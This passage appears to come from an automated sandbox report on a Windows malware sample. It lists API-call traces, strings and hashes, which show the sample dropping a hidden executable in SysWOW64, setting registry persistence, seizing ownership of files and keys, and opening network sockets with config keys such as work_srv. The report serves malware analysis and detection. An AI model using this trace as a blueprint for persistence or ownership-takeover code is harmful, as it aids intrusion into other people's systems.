                                                                                        • Opcode ID: 17a9aa356eb7964f79448f848511744e029a14576c0ff14f59890d2228000c73
                                                                                        • Instruction ID: 68d3b74a61d8da24685d2c7d21854d87d7e5c343c8b3ec1e3967b08f84d9f298
                                                                                        • Opcode Fuzzy Hash: 17a9aa356eb7964f79448f848511744e029a14576c0ff14f59890d2228000c73
                                                                                        • Instruction Fuzzy Hash: C251E23190020A9FCF01DF64D8889FABB79FF15304F10457AEC95E7290E7769A19CB88
                                                                                        APIs
                                                                                          • Part of subcall function 02D72F88: GetModuleHandleA.KERNEL32(?), ref: 02D72FA1
                                                                                          • Part of subcall function 02D72F88: LoadLibraryA.KERNEL32(?), ref: 02D72FB1
                                                                                        • GetProcessHeap.KERNEL32(00000000,00000000), ref: 02D731DA
                                                                                        • HeapFree.KERNEL32(00000000), ref: 02D731E1
                                                                                        Memory Dump Source
                                                                                        • Source File: 0000000C.00000002.2086526965.0000000002D70000.00000040.00001000.00020000.00000000.sdmp, Offset: 02D70000, based on PE: false
                                                                                        Yara matches
                                                                                        Similarity
                                                                                        • API ID: Heap$FreeHandleLibraryLoadModuleProcess
                                                                                        • String ID:
                                                                                        • API String ID: 1017166417-0
                                                                                        • Opcode ID: 6d22c46e4b2bbf8f956e586da185c112e243b929c4a2d348202b24ffe9e68596
                                                                                        • Instruction ID: 634a3a2d03939779a4bc9ac3e6d5dc85ee10c56fdf1a875cf876cdf945d9fb02
                                                                                        • Opcode Fuzzy Hash: 6d22c46e4b2bbf8f956e586da185c112e243b929c4a2d348202b24ffe9e68596
                                                                                        • Instruction Fuzzy Hash: 6951997190024AAFCB119F64D888AEAB7B5FF15305F2481A9EC9687310F736DE19CB90
                                                                                        APIs
                                                                                        • closesocket.WS2_32(?), ref: 030FCA4E
                                                                                        • closesocket.WS2_32(?), ref: 030FCB63
                                                                                        • GetTempPathA.KERNEL32(00000120,?), ref: 030FCC28
                                                                                        • CreateFileA.KERNEL32(?,40000000,00000000,00000000,00000002,00000000,00000000), ref: 030FCCB4
                                                                                        • WriteFile.KERNEL32(030FA4B3,?,-000000E8,?,00000000), ref: 030FCCDC
                                                                                        • CloseHandle.KERNEL32(030FA4B3), ref: 030FCCED
                                                                                        • wsprintfA.USER32 ref: 030FCD21
                                                                                        • CreateProcessA.KERNEL32(00000000,?,00000000,00000000,00000000,08000000,00000000,00000000,?,?), ref: 030FCD77
                                                                                        • WaitForSingleObject.KERNEL32(?,0000EA60), ref: 030FCD89
                                                                                        • CloseHandle.KERNEL32(?), ref: 030FCD98
                                                                                        • CloseHandle.KERNEL32(?), ref: 030FCD9D
                                                                                        • DeleteFileA.KERNEL32(?), ref: 030FCDC4
                                                                                        • CloseHandle.KERNEL32(030FA4B3), ref: 030FCDCC
                                                                                        • GetEnvironmentVariableA.KERNEL32(00000000,?,?,?,?,00000100), ref: 030FCFB1
                                                                                        • GetSystemDirectoryA.KERNEL32(?,00000100), ref: 030FCFEF
                                                                                        • GetSystemDirectoryA.KERNEL32(?,00000100), ref: 030FD033
                                                                                        • lstrcatA.KERNEL32(?,04700108), ref: 030FD10C
                                                                                        • SetFileAttributesA.KERNEL32(?,00000080), ref: 030FD155
                                                                                        • CreateFileA.KERNEL32(?,C0000000,00000000,00000000,00000002,00000080,00000000), ref: 030FD171
                                                                                        • WriteFile.KERNEL32(00000000,0470012C,?,?,00000000), ref: 030FD195
                                                                                        • CloseHandle.KERNEL32(00000000), ref: 030FD19C
                                                                                        • SetFileAttributesA.KERNEL32(?,00000002), ref: 030FD1C8
                                                                                        • GetEnvironmentVariableA.KERNEL32(00000000,?,?,?,?,00000100), ref: 030FD231
                                                                                        • lstrcatA.KERNEL32(?,04700108,?,?,?,?,?,?,?,00000100), ref: 030FD27C
                                                                                        • SetFileAttributesA.KERNEL32(?,00000080,?,?,?,?,?,?,?,00000100), ref: 030FD2AB
                                                                                        • CreateFileA.KERNEL32(?,C0000000,00000000,00000000,00000002,00000080,00000000,?,?,?,?,?,?,?,00000100), ref: 030FD2C7
                                                                                        • WriteFile.KERNEL32(00000000,0470012C,?,?,00000000,?,?,?,?,?,?,?,00000100), ref: 030FD2EB
                                                                                        • CloseHandle.KERNEL32(00000000,?,?,?,?,?,?,?,00000100), ref: 030FD2F2
                                                                                        • SetFileAttributesA.KERNEL32(?,00000002,?,?,?,?,?,?,?,00000100), ref: 030FD326
                                                                                        • GetEnvironmentVariableA.KERNEL32(00000000,?,?,?,?,00000100), ref: 030FD372
                                                                                        • lstrcatA.KERNEL32(?,04700108,?,?,?,?,?,?,?,00000100), ref: 030FD3BD
                                                                                        • SetFileAttributesA.KERNEL32(?,00000080,?,?,?,?,?,?,?,00000100), ref: 030FD3EC
                                                                                        • CreateFileA.KERNEL32(?,C0000000,00000000,00000000,00000002,00000080,00000000,?,?,?,?,?,?,?,00000100), ref: 030FD408
                                                                                        • WriteFile.KERNEL32(00000000,0470012C,?,?,00000000,?,?,?,?,?,?,?,00000100), ref: 030FD428
                                                                                        • CloseHandle.KERNEL32(00000000,?,?,?,?,?,?,?,00000100), ref: 030FD42F
                                                                                        • SetFileAttributesA.KERNEL32(?,00000002,?,?,?,?,?,?,?,00000100), ref: 030FD45B
                                                                                        • CreateProcessA.KERNEL32(?,03100264,00000000,00000000,00000000,08000000,00000000,00000000,?,?), ref: 030FD4DE
                                                                                        • CloseHandle.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,00000100), ref: 030FD4F4
                                                                                        • CloseHandle.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,00000100), ref: 030FD4FC
                                                                                        • DeleteFileA.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,00000100), ref: 030FD513
                                                                                        • closesocket.WS2_32(?), ref: 030FD56C
                                                                                        • Sleep.KERNEL32(000003E8), ref: 030FD577
                                                                                        • ExitProcess.KERNEL32 ref: 030FD583
                                                                                        • wsprintfA.USER32 ref: 030FD81F
                                                                                          • Part of subcall function 030FC65C: send.WS2_32(00000000,?,00000000), ref: 030FC74B
                                                                                        • closesocket.WS2_32(?), ref: 030FDAD5
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 0000000F.00000002.3299841695.00000000030F0000.00000040.00000400.00020000.00000000.sdmp, Offset: 030F0000, based on PE: true
                                                                                        Yara matches
                                                                                        Similarity
                                                                                        • API ID: File$CloseHandle$AttributesCreate$Writeclosesocket$EnvironmentProcessVariablelstrcat$DeleteDirectorySystemwsprintf$ExitObjectPathSingleSleepTempWaitsend
                                                                                        • String ID: .dat$.sys$4$@$C:\Windows\SysWOW64\ycgeofkw\xvkslbws.exe$\$\$drivers\$except_info$flags_upd$lid_file_upd$local_time$localcfg$srv_time$time_cfg$work_srv$wtm_c$wtm_r$wtm_w
                                                                                        • API String ID: 562065436-334654071
                                                                                        • Opcode ID: ac30cc3ab36c909afff80b318b80e9ec9c089251729b6f8c5a1c993da83f7151
                                                                                        • Instruction ID: dbfafcf03839bec3f4af05c494f98703a5f8c94961ddf35a0e3e3defc626de5c
                                                                                        • Opcode Fuzzy Hash: ac30cc3ab36c909afff80b318b80e9ec9c089251729b6f8c5a1c993da83f7151
                                                                                        • Instruction Fuzzy Hash: EAB2D575902209AFEB54EFA4DD49FEEBBBCEB4C304F080469E705A7544D7B09A85CB60
                                                                                        APIs
                                                                                        • SetErrorMode.KERNELBASE(00000003), ref: 030F9A7F
                                                                                        • SetErrorMode.KERNELBASE(00000003), ref: 030F9A83
                                                                                        • SetUnhandledExceptionFilter.KERNEL32(030F6511), ref: 030F9A8A
                                                                                          • Part of subcall function 030FEC54: GetSystemTimeAsFileTime.KERNEL32(?), ref: 030FEC5E
                                                                                          • Part of subcall function 030FEC54: GetVolumeInformationA.KERNELBASE(00000000,00000000,00000004,?,00000000,00000000,00000000,00000000), ref: 030FEC72
                                                                                          • Part of subcall function 030FEC54: GetTickCount.KERNEL32 ref: 030FEC78
                                                                                        • GetModuleHandleA.KERNEL32(00000000,?,0000012C), ref: 030F9AB3
                                                                                        • GetModuleFileNameA.KERNEL32(00000000), ref: 030F9ABA
                                                                                        • GetCommandLineA.KERNEL32 ref: 030F9AFD
                                                                                        • lstrlenA.KERNEL32(?), ref: 030F9B99
                                                                                        • ExitProcess.KERNEL32 ref: 030F9C06
                                                                                        • GetTempPathA.KERNEL32(000001F4,?), ref: 030F9CAC
                                                                                        • lstrcpyA.KERNEL32(?,00000000), ref: 030F9D7A
                                                                                        • lstrcatA.KERNEL32(?,?), ref: 030F9D8B
                                                                                        • lstrcatA.KERNEL32(?,0310070C), ref: 030F9D9D
                                                                                        • GetFileAttributesExA.KERNEL32(00000022,00000000,?), ref: 030F9DED
                                                                                        • DeleteFileA.KERNEL32(00000022), ref: 030F9E38
                                                                                        • GetEnvironmentVariableA.KERNEL32(00000000,?,?,?,?,000001F4), ref: 030F9E6F
                                                                                        • lstrcpyA.KERNEL32(?,00000022,?,?,?,?,?,?,?,?,?,?,?,?,000001F4), ref: 030F9EC8
                                                                                        • lstrlenA.KERNEL32(00000022,?,?,?,?,?,?,?,?,?,?,?,?,000001F4), ref: 030F9ED5
                                                                                        • RegOpenKeyExA.ADVAPI32(80000001,00000000,?,?,00000000,00000103,?), ref: 030F9F3B
                                                                                        • RegSetValueExA.ADVAPI32(?,?,00000000,00000001,00000022,?,?,?,00000000,00000103,?), ref: 030F9F5E
                                                                                        • RegCloseKey.ADVAPI32(?,?,?,00000000,00000103,?), ref: 030F9F6A
                                                                                        • GetModuleHandleA.KERNEL32(00000000,?,00000104,?,?,?,?,?,?,?,?,?,?,?,00000000,00000103), ref: 030F9FAD
                                                                                        • GetModuleFileNameA.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,00000000,00000103,?), ref: 030F9FB4
                                                                                        • GetDriveTypeA.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,00000000,00000103,?), ref: 030F9FFE
                                                                                        • lstrcatA.KERNEL32(00000022,00000000), ref: 030FA038
                                                                                        • lstrcatA.KERNEL32(00000022,03100A34), ref: 030FA05E
                                                                                        • lstrcatA.KERNEL32(00000022,00000022), ref: 030FA072
                                                                                        • lstrcatA.KERNEL32(00000022,03100A34), ref: 030FA08D
                                                                                        • wsprintfA.USER32 ref: 030FA0B6
                                                                                        • lstrcatA.KERNEL32(00000022,00000000), ref: 030FA0DE
                                                                                        • lstrcatA.KERNEL32(00000022,?), ref: 030FA0FD
                                                                                        • CreateProcessA.KERNEL32(00000000,00000022,00000000,00000000,00000000,08000000,00000000,00000000,00000044,?), ref: 030FA120
                                                                                        • DeleteFileA.KERNEL32(00000022,?,?,?,?,?,?,?,?,?,?,?,00000000,00000103,?), ref: 030FA131
                                                                                        • GetModuleHandleA.KERNEL32(00000000,00000022,0000012C), ref: 030FA174
                                                                                        • GetModuleFileNameA.KERNEL32(00000000), ref: 030FA17B
                                                                                        • GetDriveTypeA.KERNEL32(00000022), ref: 030FA1B6
                                                                                        • GetCommandLineA.KERNEL32 ref: 030FA1E5
                                                                                          • Part of subcall function 030F99D2: lstrcpyA.KERNEL32(?,?,00000100,031022F8,00000000,?,030F9E9D,?,00000022,?,?,?,?,?,?,?), ref: 030F99DF
                                                                                          • Part of subcall function 030F99D2: lstrcatA.KERNEL32(00000022,00000000,?,?,030F9E9D,?,00000022,?,?,?,?,?,?,?,000001F4), ref: 030F9A3C
                                                                                          • Part of subcall function 030F99D2: lstrcatA.KERNEL32(?,00000022,?,?,?,?,?,030F9E9D,?,00000022,?,?,?), ref: 030F9A52
                                                                                        • lstrlenA.KERNEL32(?), ref: 030FA288
                                                                                        • StartServiceCtrlDispatcherA.ADVAPI32(?), ref: 030FA3B7
                                                                                        • GetLastError.KERNEL32 ref: 030FA3ED
                                                                                        • Sleep.KERNEL32(000003E8), ref: 030FA400
                                                                                        • DeleteFileA.KERNELBASE(031033D8), ref: 030FA407
                                                                                        • CreateThread.KERNELBASE(00000000,00000000,030F405E,00000000,00000000,00000000), ref: 030FA42C
                                                                                        • WSAStartup.WS2_32(00001010,?), ref: 030FA43A
                                                                                        • CreateThread.KERNELBASE(00000000,00000000,030F877E,00000000,00000000,00000000), ref: 030FA469
                                                                                        • Sleep.KERNELBASE(00000BB8), ref: 030FA48A
                                                                                        • GetTickCount.KERNEL32 ref: 030FA49F
                                                                                        • GetTickCount.KERNEL32 ref: 030FA4B7
                                                                                        • Sleep.KERNELBASE(00001A90), ref: 030FA4C3
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 0000000F.00000002.3299841695.00000000030F0000.00000040.00000400.00020000.00000000.sdmp, Offset: 030F0000, based on PE: true
                                                                                        Yara matches
                                                                                        Similarity
                                                                                        • API ID: lstrcat$File$Module$CountCreateDeleteErrorHandleNameSleepTicklstrcpylstrlen$CommandDriveLineModeProcessThreadTimeType$AttributesCloseCtrlDispatcherEnvironmentExceptionExitFilterInformationLastOpenPathServiceStartStartupSystemTempUnhandledValueVariableVolumewsprintf
                                                                                        • String ID: "$"$"$%X%08X$C:\Windows\SysWOW64\ycgeofkw\xvkslbws.exe$D$P$\$ycgeofkw
                                                                                        • API String ID: 2089075347-209952241
                                                                                        • Opcode ID: 365d81e68e71fbafb3c00c096fe84be058e2abc3062fea915c78848915b7ef4d
                                                                                        • Instruction ID: d479ffcf39b933f7d3e0d99dad096aa026420469fa170a1ca074d91eba9dd89e
                                                                                        • Opcode Fuzzy Hash: 365d81e68e71fbafb3c00c096fe84be058e2abc3062fea915c78848915b7ef4d
                                                                                        • Instruction Fuzzy Hash: 185293B1D42359AFDB11EBA4DC48FEE77BCAF48304F1844A5E709E6541E7709A848F60
                                                                                        APIs
                                                                                        • inet_addr.WS2_32(123.45.67.89), ref: 030F19B1
                                                                                        • LoadLibraryA.KERNELBASE(Iphlpapi.dll,?,?,?,?,00000001,030F1E9E), ref: 030F19BF
                                                                                        • GetProcAddress.KERNEL32(00000000,GetAdaptersInfo), ref: 030F19E2
                                                                                        • GetProcAddress.KERNEL32(00000000,GetIfEntry), ref: 030F19ED
                                                                                        • GetProcAddress.KERNEL32(?,GetBestInterface), ref: 030F19F9
                                                                                        • GetBestInterface.IPHLPAPI(?,?,?,?,?,?,00000001,030F1E9E), ref: 030F1A1B
                                                                                        • GetProcessHeap.KERNEL32(?,?,?,?,00000001,030F1E9E), ref: 030F1A1D
                                                                                        • HeapAlloc.KERNEL32(00000000,00000000,00000288,?,?,?,?,00000001,030F1E9E), ref: 030F1A36
                                                                                        • GetAdaptersInfo.IPHLPAPI(00000000,030F1E9E,?,?,?,?,00000001,030F1E9E), ref: 030F1A4A
                                                                                        • HeapReAlloc.KERNEL32(?,00000000,00000000,030F1E9E,?,?,?,?,00000001,030F1E9E), ref: 030F1A5A
                                                                                        • GetAdaptersInfo.IPHLPAPI(00000000,030F1E9E,?,?,?,?,00000001,030F1E9E), ref: 030F1A6E
                                                                                        • HeapFree.KERNEL32(?,00000000,00000000,?,?,?,?,00000001,030F1E9E), ref: 030F1A9B
                                                                                        • FreeLibrary.KERNEL32(?,?,?,?,?,00000001,030F1E9E), ref: 030F1AA4
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 0000000F.00000002.3299841695.00000000030F0000.00000040.00000400.00020000.00000000.sdmp, Offset: 030F0000, based on PE: true
                                                                                        Yara matches
                                                                                        Similarity
                                                                                        • API ID: Heap$AddressProc$AdaptersAllocFreeInfoLibrary$BestInterfaceLoadProcessinet_addr
                                                                                        • String ID: 123.45.67.89$GetAdaptersInfo$GetBestInterface$GetIfEntry$Iphlpapi.dll$localcfg
                                                                                        • API String ID: 293628436-270533642
                                                                                        • Opcode ID: c14893ea09ef65ef06083b5a40dfdf2e25f397ac82aff83122f8a050e5203176
                                                                                        • Instruction ID: 1b58af5de01ece5a46f5493ca62c798a33c64d7792fd2937dd34f687ac392b7d
                                                                                        • Opcode Fuzzy Hash: c14893ea09ef65ef06083b5a40dfdf2e25f397ac82aff83122f8a050e5203176
                                                                                        • Instruction Fuzzy Hash: 50315431D01159EFCB55EFE4CC889BEBBF9EF4D255B184679E601A2500D7708940CB60
                                                                                        APIs
                                                                                        • RegOpenKeyExA.KERNELBASE(000000E4,00000022,00000000,000E0100,00000000,00000000), ref: 030F7ABA
                                                                                        • GetUserNameA.ADVAPI32(?,?), ref: 030F7ADF
                                                                                        • LookupAccountNameA.ADVAPI32(00000000,?,?,0310070C,?,?,?), ref: 030F7B16
                                                                                        • RegGetKeySecurity.ADVAPI32(00000000,00000005,?,?), ref: 030F7B3B
                                                                                        • GetSecurityDescriptorOwner.ADVAPI32(?,00000022,80000002), ref: 030F7B59
                                                                                        • EqualSid.ADVAPI32(?,00000022), ref: 030F7B6A
                                                                                        • LocalAlloc.KERNEL32(00000040,00000014), ref: 030F7B7E
                                                                                        • InitializeSecurityDescriptor.ADVAPI32(00000000,00000001), ref: 030F7B8C
                                                                                        • SetSecurityDescriptorOwner.ADVAPI32(00000000,?,00000000), ref: 030F7B9C
                                                                                        • RegSetKeySecurity.KERNELBASE(00000000,00000001,00000000), ref: 030F7BAB
                                                                                        • LocalFree.KERNEL32(00000000), ref: 030F7BB2
                                                                                        • GetSecurityDescriptorDacl.ADVAPI32(?,030F7FC9,?,00000000), ref: 030F7BCE
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 0000000F.00000002.3299841695.00000000030F0000.00000040.00000400.00020000.00000000.sdmp, Offset: 030F0000, based on PE: true
                                                                                        Yara matches
                                                                                        Similarity
                                                                                        • API ID: Security$Descriptor$LocalNameOwner$AccountAllocDaclEqualFreeInitializeLookupOpenUser
                                                                                        • String ID: C:\Windows\SysWOW64\ycgeofkw\xvkslbws.exe$D
                                                                                        • API String ID: 2976863881-3037353064
                                                                                        • Opcode ID: c891277f92610de8f833cd5edff76b88fe01a1c21e10564d3f4f8f4a928a118f
                                                                                        • Instruction ID: 4b2234520365fe07b20fdcb38bdc365d78bd6f8a985493ddfff5f0d26de2f016
                                                                                        • Opcode Fuzzy Hash: c891277f92610de8f833cd5edff76b88fe01a1c21e10564d3f4f8f4a928a118f
                                                                                        • Instruction Fuzzy Hash: 9AA15871901219AFDB51DFA0CD88FEEBBBDFF48B84F088069E605E2144D7758A85CB61
                                                                                        APIs
                                                                                        • GetUserNameA.ADVAPI32(?,?), ref: 030F782F
                                                                                        • LookupAccountNameA.ADVAPI32(00000000,?,?,?,?,?,?), ref: 030F7866
                                                                                        • GetLengthSid.ADVAPI32(?), ref: 030F7878
                                                                                        • GetFileSecurityA.ADVAPI32(?,00000005,?,00000400,?), ref: 030F789A
                                                                                        • GetSecurityDescriptorOwner.ADVAPI32(?,030F7F63,?), ref: 030F78B8
                                                                                        • EqualSid.ADVAPI32(?,030F7F63), ref: 030F78D2
                                                                                        • LocalAlloc.KERNEL32(00000040,00000014), ref: 030F78E3
                                                                                        • InitializeSecurityDescriptor.ADVAPI32(00000000,00000001), ref: 030F78F1
                                                                                        • SetSecurityDescriptorOwner.ADVAPI32(00000000,?,00000000), ref: 030F7901
                                                                                        • SetFileSecurityA.ADVAPI32(?,00000001,00000000), ref: 030F7910
                                                                                        • LocalFree.KERNEL32(00000000), ref: 030F7917
                                                                                        • GetSecurityDescriptorDacl.ADVAPI32(?,?,?,?), ref: 030F7933
                                                                                        • GetAce.ADVAPI32(?,00000000,?), ref: 030F7963
                                                                                        • EqualSid.ADVAPI32(?,030F7F63), ref: 030F798A
                                                                                        • DeleteAce.ADVAPI32(?,00000000), ref: 030F79A3
                                                                                        • EqualSid.ADVAPI32(?,030F7F63), ref: 030F79C5
                                                                                        • LocalAlloc.KERNEL32(00000040,00000014), ref: 030F7A4A
                                                                                        • InitializeSecurityDescriptor.ADVAPI32(00000000,00000001), ref: 030F7A58
                                                                                        • SetSecurityDescriptorDacl.ADVAPI32(00000000,00000001,?,00000000), ref: 030F7A69
                                                                                        • SetFileSecurityA.ADVAPI32(?,00000004,00000000), ref: 030F7A79
                                                                                        • LocalFree.KERNEL32(00000000), ref: 030F7A87
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 0000000F.00000002.3299841695.00000000030F0000.00000040.00000400.00020000.00000000.sdmp, Offset: 030F0000, based on PE: true
                                                                                        Yara matches
                                                                                        Similarity
                                                                                        • API ID: Security$Descriptor$Local$EqualFile$AllocDaclFreeInitializeNameOwner$AccountDeleteLengthLookupUser
                                                                                        • String ID: D
                                                                                        • API String ID: 3722657555-2746444292
                                                                                        • Opcode ID: b32e78c839a30f2d4cc9a7943ed2d968975b2311285d2b410b102ee03917ac64
                                                                                        • Instruction ID: f6ae14967cc974031228e7e43c762512b4d08b1e66cabe9240ba370011254f5c
                                                                                        • Opcode Fuzzy Hash: b32e78c839a30f2d4cc9a7943ed2d968975b2311285d2b410b102ee03917ac64
                                                                                        • Instruction Fuzzy Hash: 2F816B71D0120AAFDB21DFA4C944FEEBBBCAF4C784F09816AE615E2140D7758645CBA2
                                                                                        APIs
                                                                                        • RegOpenKeyExA.KERNELBASE(80000002,00000000,?,?,00000000,00000103,Function_00010750,?,?,00000000,localcfg,00000000), ref: 030F83F3
                                                                                        • RegQueryValueExA.KERNELBASE(03100750,?,00000000,?,030F8893,?,?,?,00000000,00000103,Function_00010750,?,?,00000000,localcfg,00000000), ref: 030F8414
                                                                                        • RegSetValueExA.KERNELBASE(03100750,?,00000000,00000004,030F8893,00000004,?,?,00000000,00000103,Function_00010750,?,?,00000000,localcfg,00000000), ref: 030F8441
                                                                                        • RegCloseKey.ADVAPI32(03100750,?,?,00000000,00000103,Function_00010750,?,?,00000000,localcfg,00000000), ref: 030F844A
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 0000000F.00000002.3299841695.00000000030F0000.00000040.00000400.00020000.00000000.sdmp, Offset: 030F0000, based on PE: true
                                                                                        Yara matches
                                                                                        Similarity
                                                                                        • API ID: Value$CloseOpenQuery
                                                                                        • String ID: C:\Windows\SysWOW64\ycgeofkw\xvkslbws.exe$localcfg
                                                                                        • API String ID: 237177642-1954108138
                                                                                        • Opcode ID: 753452249ada0b04f71f97b6c655c612c3140987f6ec4d4b02351f0207863855
                                                                                        • Instruction ID: 39fee1603a0a4d1629cce4192694b3aa8a25b47a2c139f1fcbcf8df44c2cbfad
                                                                                        • Opcode Fuzzy Hash: 753452249ada0b04f71f97b6c655c612c3140987f6ec4d4b02351f0207863855
                                                                                        • Instruction Fuzzy Hash: 1CC1B475D4220CBFEB51EBA4DD84EFEB7BCEB08704F148465F704A6450EA715A85CB21
                                                                                        APIs
                                                                                        • GetVersionExA.KERNEL32 ref: 030F1DC6
                                                                                        • GetSystemInfo.KERNELBASE(?), ref: 030F1DE8
                                                                                        • GetModuleHandleA.KERNEL32(kernel32,IsWow64Process), ref: 030F1E03
                                                                                        • GetProcAddress.KERNEL32(00000000), ref: 030F1E0A
                                                                                        • GetCurrentProcess.KERNEL32(?), ref: 030F1E1B
                                                                                        • GetTickCount.KERNEL32 ref: 030F1FC9
                                                                                          • Part of subcall function 030F1BDF: GetComputerNameA.KERNEL32(?,0000000F), ref: 030F1C15
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 0000000F.00000002.3299841695.00000000030F0000.00000040.00000400.00020000.00000000.sdmp, Offset: 030F0000, based on PE: true
                                                                                        Yara matches
                                                                                        Similarity
                                                                                        • API ID: AddressComputerCountCurrentHandleInfoModuleNameProcProcessSystemTickVersion
                                                                                        • String ID: IsWow64Process$born_date$flags_upd$hi_id$kernel32$lid_file_upd$loader_id$localcfg$net_type$start_srv$work_srv
                                                                                        • API String ID: 4207808166-1381319158
                                                                                        • Opcode ID: 08c337a0e1b9d2b562d938a37c23691be04cfc9a9dbb27aade9b34fb0e88e640
                                                                                        • Instruction ID: 83474a3073b73943995f58cfe3220034d855703bf7e27b04c31b990fe212a685
                                                                                        • Opcode Fuzzy Hash: 08c337a0e1b9d2b562d938a37c23691be04cfc9a9dbb27aade9b34fb0e88e640
                                                                                        • Instruction Fuzzy Hash: 0951D7B0905344AFE364EF75CC85F6BBAECFF88608F04091DF6558A952D7B4A504C7A1
                                                                                        APIs
                                                                                        • RegOpenKeyExA.KERNELBASE(80000002,00000000,00020119,00000000,?,75920F10,00000000), ref: 030F7472
                                                                                        • RegOpenKeyExA.KERNELBASE(00000000,?,00000000,00000101,?,?,?,?,?,?,?,75920F10,00000000), ref: 030F74F0
                                                                                        • RegQueryValueExA.KERNELBASE(?,00000000,?,00000000,?,?,00000104,?,?,?,?,?,?,75920F10,00000000), ref: 030F7528
                                                                                        • ___ascii_stricmp.LIBCMT ref: 030F764D
                                                                                        • RegCloseKey.ADVAPI32(?,?,?,?,?,?,?,?,?,?,75920F10,00000000), ref: 030F76E7
                                                                                        • RegEnumKeyA.ADVAPI32(00000000,00000000,?,00000104), ref: 030F7706
                                                                                        • RegCloseKey.ADVAPI32(00000000,?,?,?,?,?,?,75920F10,00000000), ref: 030F7717
                                                                                        • RegCloseKey.ADVAPI32(?,?,?,?,?,?,?,75920F10,00000000), ref: 030F7745
                                                                                        • RegCloseKey.ADVAPI32(00000000,?,?,?,?,?,?,75920F10,00000000), ref: 030F77EF
                                                                                          • Part of subcall function 030FF1A5: lstrlenA.KERNEL32(000000C8,000000E4,031022F8,000000C8,030F7150,?), ref: 030FF1AD
                                                                                        • GetFileAttributesExA.KERNEL32(00000022,00000000,?), ref: 030F778F
                                                                                        • RegCloseKey.KERNELBASE(?), ref: 030F77E6
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 0000000F.00000002.3299841695.00000000030F0000.00000040.00000400.00020000.00000000.sdmp, Offset: 030F0000, based on PE: true
                                                                                        Yara matches
                                                                                        Similarity
                                                                                        • API ID: Close$Open$AttributesEnumFileQueryValue___ascii_stricmplstrlen
                                                                                        • String ID: "
                                                                                        • API String ID: 3433985886-123907689
                                                                                        • Opcode ID: 53939079233d825518327bc185546f415012db23f4d82f414c9fdb524ad6422e
                                                                                        • Instruction ID: 577af8449f2b65148392abb231476ad1797fb41ce132757dab6a66356dc2cf8f
                                                                                        • Opcode Fuzzy Hash: 53939079233d825518327bc185546f415012db23f4d82f414c9fdb524ad6422e
                                                                                        • Instruction Fuzzy Hash: 4EC1C375902209AFDB11DBA4DC44FEFBBFDEF48740F140495E604AA590EB71DA84CB61
                                                                                        APIs
                                                                                        • SetFileAttributesA.KERNEL32(?,00000080,?,75920F10,00000000), ref: 030F677E
                                                                                        • CreateFileA.KERNELBASE(?,80000000,00000003,00000000,00000003,00000080,00000000,?,75920F10,00000000), ref: 030F679A
                                                                                        • CreateFileA.KERNEL32(?,80000000,00000003,00000000,00000003,00000004,00000000,?,75920F10,00000000), ref: 030F67B0
                                                                                        • SetFileAttributesA.KERNEL32(?,00000002,?,75920F10,00000000), ref: 030F67BF
                                                                                        • GetFileSize.KERNEL32(000000FF,00000000,?,75920F10,00000000), ref: 030F67D3
                                                                                        • ReadFile.KERNELBASE(000000FF,?,00000040,030F8244,00000000,?,75920F10,00000000), ref: 030F6807
                                                                                        • SetFilePointer.KERNELBASE(000000FF,?,00000000,00000000,?,75920F10,00000000), ref: 030F681F
                                                                                        • ReadFile.KERNELBASE(000000FF,?,000000F8,?,00000000,?,75920F10,00000000), ref: 030F683E
                                                                                        • SetFilePointer.KERNELBASE(000000FF,?,00000000,00000000,?,75920F10,00000000), ref: 030F685C
                                                                                        • ReadFile.KERNEL32(000000FF,?,00000028,030F8244,00000000,?,75920F10,00000000), ref: 030F688B
                                                                                        • SetFilePointer.KERNELBASE(000000FF,00000000,00000000,00000000,?,75920F10,00000000), ref: 030F6906
                                                                                        • ReadFile.KERNEL32(000000FF,?,00000000,030F8244,00000000,?,75920F10,00000000), ref: 030F691C
                                                                                        • FindCloseChangeNotification.KERNELBASE(000000FF,?,75920F10,00000000), ref: 030F6971
                                                                                          • Part of subcall function 030FEC2E: GetProcessHeap.KERNEL32(00000000,030FEA27,00000000,030FEA27,00000000), ref: 030FEC41
                                                                                          • Part of subcall function 030FEC2E: RtlFreeHeap.NTDLL(00000000), ref: 030FEC48
                                                                                        Memory Dump Source
                                                                                        • Source File: 0000000F.00000002.3299841695.00000000030F0000.00000040.00000400.00020000.00000000.sdmp, Offset: 030F0000, based on PE: true
                                                                                        Yara matches
                                                                                        Similarity
                                                                                        • API ID: File$Read$Pointer$AttributesCreateHeap$ChangeCloseFindFreeNotificationProcessSize
                                                                                        • String ID:
                                                                                        • API String ID: 1400801100-0
                                                                                        • Opcode ID: 93270c00b45f7677c530c52fc23fce52d24e68a8f2bb95a927509edf0d5277af
                                                                                        • Instruction ID: babf2bd29612583b1be685300fbb17a07dc2bb2f8b1c3cb438773ab5c343267a
                                                                                        • Opcode Fuzzy Hash: 93270c00b45f7677c530c52fc23fce52d24e68a8f2bb95a927509edf0d5277af
                                                                                        • Instruction Fuzzy Hash: 47712971C0521DEFDF11DFA4CC80AEEBBB9FB08354F14456AE615A6190E7319E92CB60
                                                                                        APIs
                                                                                        • htons.WS2_32(030FCA1D), ref: 030FF34D
                                                                                        • socket.WS2_32(00000002,00000001,00000000), ref: 030FF367
                                                                                        • closesocket.WS2_32(00000000), ref: 030FF375
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 0000000F.00000002.3299841695.00000000030F0000.00000040.00000400.00020000.00000000.sdmp, Offset: 030F0000, based on PE: true
                                                                                        Yara matches
                                                                                        Similarity
                                                                                        • API ID: closesockethtonssocket
                                                                                        • String ID: time_cfg
                                                                                        • API String ID: 311057483-2401304539
                                                                                        • Opcode ID: a61ce7807bd8ccd9f2ceb6372a55763db17dc71534fa371650b4f363ac86114d
